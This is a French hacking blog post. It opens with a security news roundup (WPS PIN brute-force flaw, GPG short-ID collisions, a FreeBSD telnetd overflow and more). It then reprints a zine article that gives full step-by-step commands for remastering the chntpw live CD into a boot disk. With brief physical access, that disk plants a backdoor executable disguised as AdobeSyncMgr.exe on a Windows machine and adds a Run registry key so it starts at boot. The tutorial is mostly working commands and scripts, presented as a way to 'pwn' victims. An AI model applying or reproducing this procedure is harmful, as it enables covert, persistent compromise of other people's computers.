Via PacketStorm :
Un étudiant de l’Université d’Essex (Angleterre) a publié sa thèse sur les attaques DDoS et les méthodes pour s’en protéger. Ça tourne sur Cisco pour la seconde partie.
Le document (55 pages) est ici au format PDF
Via différentes sources dont PCINpact et ZDNet :
Le standard Wi-Fi Protected Setup qui permet aux n00bs de mettre en place leur réseau WiFi a été cassé.
L’attaque se base sur le brute force du PIN WPS qui tient uniquement sur 8 caractères.
Une fois qu’il est récupéré, on peut accéder plus facilement à la passphrase WPA/WPA2 
Le temps de l’attaque au total prend entre 4 et 10h… selon la puissante de la machine et bien sûr la proximité du réseau cible.
La grosse erreur de conception c’est que lors de l’authentification sur ce PIN (dans un procédé de handshake décrit dans le paper), le point d’accès répond une première fois avec un paquet Extensible Authentication Protocol-Negative Acknowledgement (EAP-NACK) pour indiquer que la première moitié du PIN est valide et une seconde fois pour la seconde moitié.
Cela réduit donc fortement le temps d’une attaque par force brute.
Il faudra alors au maximum 11000 tentatives pour arriver à trouver le bon PIN.
Ce qu’il faut retenir pour le moment c’est qu’un certain Stefan Viehböck (sviehb) a publié un whitepaper sur cette attaque brute force et compte publier un outil basé sur Scapy.
Mais /dev/ttyS0 a décidé de le prendre de vitesse en sortant une version open-source de son logiciel Reaver sur Google Code.
A l’heure actuelle, la seule solution pour bloquer cette attaque consiste à désactiver WPS (quand cela est possible).
La faute est aussi imputable aux constructeurs qui n’ont pas mis de mécanismes pour empêcher les attaques brute force ou les rendre difficiles.
Via SANS Storm Center :
Une nouvelle version de la Cuckoo Sandbox, une sandbox pour l’analyse de malware, est disponible (version 0.3).
Le changelog est ici.
Via le Los Angeles Times :
Encore un scandale qui touche les caméras de surveillance : A Los Angeles une bonne partie des caméras de surveillance de la ville n’ont pas fonctionné ces deux dernières années.
Certaines sont cassées et n’ont pas été réparées, d’autres sont recouvertes de merde de pigeons et inutilisable ou pire encore : dans la Petite Tokyo, 6 caméras installées n’ont jamais été reliées au centre vidéo…
Les officiels avouent même que les policiers n’ont pas été correctement formés quand à la manipulation et l’utilisation de cet outil et que ça arrive que les policiers les cassent en les manipulant…
Le débat fait suite à l’assassinat d’un homme de 53 ans passé à tabac et poignardé par environ 6 personnes. Le crime a eu lieu juste en dessous d’une caméra de surveillance de la ville… qui ne fonctionnait pas.
Pourtant lors de la mise en place du système de vidéo-surveillance (qui a couté bonbon), la municipalité se félicitait d’un tel système à grand coup de médiatisation…
Via SlashDot :
Si vous utilisez GPG, vous devez savoir que les clés sont identifiées par un “short ID” dans le style 0x70096AD1.
Comme son nom l’indique cet identifiant est un peu court. Un internaute a trouvé un moyen de générer des clés de 4096 bits pour un short ID donné.
Bien sûr ça pose problème pour les logiciels basés sur GPG qui importent des clés en ce basant uniquement sur cet ID alors qu’il est possible d’utiliser des IDs plus long (64 bits).
Un bug report a été ouvert sur le tracker de GPG.
Via LinuxFR :
Une nouvelle norme du langage C a été publiée. Elle est pas belle la vie ? :p
Via SlashDot :
Le registrar GoDaddy doit encore se mordre les doigts de s’être déclaré favorable au projet de loi SOPA.
Il n’a pas fallu attendre longtemps pour que ça buzz : appels au boycotts, notices explicatives sur comment transférer son domaine vers un autre registrar etc le tout mené par un Reddit bien remonté ainsi que le réseau I Can Has.
Voyant les dégâts, GoDaddy a fait machine arrière mais il était déjà trop tard : 21054 domaines ont été retirés en une journée de GoDaddy (et ça continue sans doute)
Via FD et TheExploit.com :
FreeBSD a patché une vulnérabilité dans son démon telnetd qui semble t-il existait depuis 20 ans !
La faille est un classique buffer-overflow par memcpy…
A lire sur exploit-db : Un document pdf qui décrit les (impressionnantes) fonctionnalités du module Meterpreter du Metasploit Framework.
Hackeuses, hackers, discordiennes, discordiens,
Nous vous souhaitons à tous un joyeux noël.
Vous ne trouverez pas un nouveau magazine génial sous le sapin cette année mais sachez que la fabrication du LOTFREE9 avance
L’interface finale est torchée et la rédaction des articles va bon train. Toutefois nous espérons toujours recevoir des articles dans notre boite mail. Pour cela je vous renvoi au call for paper. Soyez pas timides 
Mais comme on tenait à marquer le coup, on vous offre en avant première pour noël un article extrait du LOTFREE9.
Les scripts attachés à l’article sont téléchargeables ici.
Bonne lecture.
60 secondes chrono pour pwner une machine Windows
Chapitre 1, dans lequel vous avez un aperçu du bouzin
Dans le présent article on va s’attarder sur la façon dont il est possible de placer dans le plus court espace de temps un exécutable sur une machine Windows. Le genre de truc spécialement pratique pour les forces de l’ordre des fois qu’ils voudraient mettre sous cyber-écoute un potentiel terroriste et que le bestiaud s’est absenté histoire de faire pleurer le colosse.
Ca vous permettra aussi de vous imposer en tant que hacker “et mes rites” dans les conversations animées du dimanche, des fois qu’un gravos vous facilite le transit intestinal biscotte il affirme que vous êtes pas capable de pwner son Vin dose Vista.
Oeuf-course vous relevez le défi et vous surenchérissez en disant que sa belle-pomme tiendra même pas 60 secondes dans vos mains expertes !
Ce miracle Mesdames, Mesdemoiselles, Messieurs il est possible car vous aurez gardé précieusement sur vous le dernier joujou signé LOTFREE qu’on va vous en parler dans le présent article.
Je rajouterais au passage que le titre indique 60 secondes chronos mais lors de nos tests on tournait plus autour de 40/50 secondes et sans forcer not’ talent. Quelques modifications supplémentaires dans les scripts (comme automatiser la sélection de la partition) et vous pouvez sans problèmes descendre à 30 secondes. De quoi faire manger son bitos à l’autre importun et de repartir avec sa gerse pour un tour de radada.
Chapitre 2, dans lequel vous nous appellerez Gérard Majax
Tout bon tour de magie se fait avec de bons accessoires. Dans notre cas on veut pouvoir pwner n’importe quel système Windows sans avoir à se mesurer à ses protections.
Le plus simple vous en conviendrez c’est de s’attaquer à l’animal quand il est endormi, qu’on lui introduit une saleté dans le système et qu’elle se mette en marche quand il se réveille.
Pour cela on utilisera un live CD capable d’écrire sur du NTFS. On placera alors l’exécutable win32 que l’on souhaite sur la bécane.
Mais pour bien faire les choses il faut aussi créer une clé de registre Run sur la machine de notre victime sans quoi ça n’a aucune utilité.
Enfin, derniere pirogue active, faut que tout se fasse très rapidement. On voudrait pas avoir à justifier notre présence auprès d’un mec qui sort jamais sans son 9.
L’outil qui nous servira de base et qui répond à toutes nos attentes se nomme chntpw. Vous avez dû déjà en entendre parler puisque vous êtes du milieu. Pour les zotres qui ne suivent pas il s’agit d’un soft qui permet de vider le mdp du compte admin local sur la machine. Mais il dispose aussi d’autres fonctionnalités intéressantes. D’abord :
A vrai dire, la fonction d’édition du registre on l’a découvert sur le coup, un peu en trifouillant. On pensait reprendre le code source en C et le modifier à notre sauce mais comme finalement il est possible d’utiliser directement chntpw et de lui balancer des commandes sur stdin (via un pipe), autant faire au plus simple
La première étape est de récupérer l’archive zip contenant l’image iso de chntpw. Lors de ces lignes le fichier s’appelle cd110511.zip. Toutes les commandes ont été lancées sur un système Unix mais les plus bidouilleurs parviendront peut-être à faire de même sous Windows.
On supposera que toutes les opérations ont été faites depuis le dossier /tmp et en root (important biscotte la présence de dossiers style dev, proc & co). La seconde étape consiste à monter l’iso et faire une copie de tous les fichiers du disque. On tapera les commandes suivantes :
cd /tmp
mkdir disque
mount -o loop,ro cd110511.iso /mnt/
cp -rv /mnt/* disque/
umount /mnt/
Avouez que ce n’était pas bien difficile… Maintenant on va devoir extraire l’image initrd présente sur le disque. L’extension .cgz je connais pas mais après un gunzip, un coup de file indique que c’est une archive cpio (classique pour les initrd). On utilisera les commandes suivantes pour extraire les fichiers :
mkdir temp_initrd
cp disque/initrd.cgz temp_initrd/
cd temp_initrd/
mv initrd.cgz initrd.cpio.gz
gunzip initrd.cpio.gz
cpio -id < initrd.cpio
rm initrd.cpio
Passons aux choses sérieuses : on va modifier amaguiz les scripts de boot de l'initrd. Ils sont dans le dossier scripts obtenu lors du désarchivage. Ensuite reste plus qu'à placer aussi l'exe kivabien + les commandes destinées à chntpw.
L'ordre d'exécution des scripts tel que défini sur chntpw suit le cheminement suivant (remarquez au passage nos m4d l33t 4sc11 sk!11z)
init
|
stage2 +-> prepdriver ---+-> fetchdrv -> floppy
+-> cat banner1 +-> autoscsci
+-> main -+-> disk -> diskscan
+-> path
+-> chntpw -L -i $files
+-> write
On va modifier quelques fichiers pour arriver à nos fins. Je n'entre pas dans les détails des modifications, si vous décidez de créer votre propre iso vous devriez trouver sans trop de difficultées quoi modifier.
Perso j'ai commencé par banner1 histoire de placer un petit logo LOTFREE en plus du copyright chntpw
J'ai ensuite modifié path.sh qui demande normalement quelle ruche (fichier registre) nous intéresse et résoud les paths windows en conséquence. Comme on sait que pour les clés Run la ruche est software, on retire la partie demandant de choisir et on force la variable files à $rcfiles. Le script path.sh place les paths des ruches dans le fichier /tmp/files et le chemin de ces ruches (windows\system32\config) dans le fichier /tmp/regpath qui sont utilisé par les autres scripts.
cd scripts/
vi banner1
vi path.sh
Etape suivante : on modifie main.sh parce que c'est ici qu'à lieu l'appel à chntpw. Dans ce script il y a moyen de gagner du temps, par exemple si vous connaissez à l'avance le path complet de la ruche de votre victime.
Comme on va mettre tous nos codes dans le dossier scripts du disque et qu'il se trouvera à la racine une fois le système monté, on rectifie l'appel à chntpw de la façon suivante :
cd /tmp
files=`cat /tmp/files`
echo "LOTF: Copie de la backdoor..."
cpnt /scripts/lotf-bd.exe /disk/`cat regpath`/../AdobeSyncMgr.exe
echo "LOTF: Edition du registre..."
cat /scripts/cmds.txt | chntpw -e $files
On suppose ici que notre exécutable lotf-bd.exe sera copié sous le nom AdobeSyncMgr.exe dans le dossier system32 de windows et que cmds.txt contient les commandes envoyées à chntpw qui sont les suivantes :
cd Microsoft\Windows\CurrentVersion\Run
nv 1 AdobeSyncMgr
ed AdobeSyncMgr
C:\Windows\System32\AdobeSyncMgr.exe
q
y
chntpw permettant de naviguer dans l'arborescence du registre comme on le ferait dans un dossier, ne soyez pas surpris d'y voir la commande cd Ici on crée une clé AdobeSyncMgr dans Run qui pointe vers notre exécutable.
Pour reprendre à la modification de nos scripts on est en à :
vi main.sh
vi write.sh
cp ~lotfree/issue9/cmds.txt .
cp ~lotfree/issue9/lotf-systembd.exe lotf-bd.exe
Le dernier script que l'on modifiera est write.sh car pour le moment, tout ce qu'on fait faire au live CD c'est une modification d'une copie d'une ruche placée dans /tmp.
Le script write.sh fait appel à un binaire spécial qui s'appelle cpnt qu'il faut impérativement utiliser car le cp classique ne copiera pas vos fichiers vers du NTFS.
Le contenu de ce script sera :
fstype=`cat /tmp/fs`
usepart=`cat /tmp/disk`
sampath=`cat /tmp/regpath`
files=`cat /tmp/files`
for f in $files; do
echo "Writing $f to $sampath"
cpnt /tmp/$f /disk/$sampath/$f
done
sync
umount /disk
exit 0
Last but not least, on doit tout remettre en place : recréer l'initrd, le gzipper comme il était et recréer un iso valide avec mkisofs. Notez que certains outils d'archivages permettent de jouer sur les fichiers isos mais les cd bootables se basent sur un soft baptisé isolinux qui vérifie rapidement le checksum du disque à son lancement. On pourra en notre qualité de hackers cracker la vérification d'isolinux mais c'est une autre histoire...
cd ..
find ./ | cpio -H newc -o > ../new_initrd.cpio
cd ..
rm -r temp_initrd/
gzip new_initrd.cpio
mv new_initrd.cpio.gz disque/initrd.cgz
cd disque
mkisofs -R -o ../lotfdisk.iso -b isolinux.bin -c boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table .
cd ..
rm -r disque/
Chapitre 3, dans lequel vous vous confondez en remerciements
Il ne vous reste plus qu'à graver le fichier lotfdisk.iso que vous aurez généré et à vous les pwnages en moins de 60 secondes chrono B-) Elle est pas belle la vie ?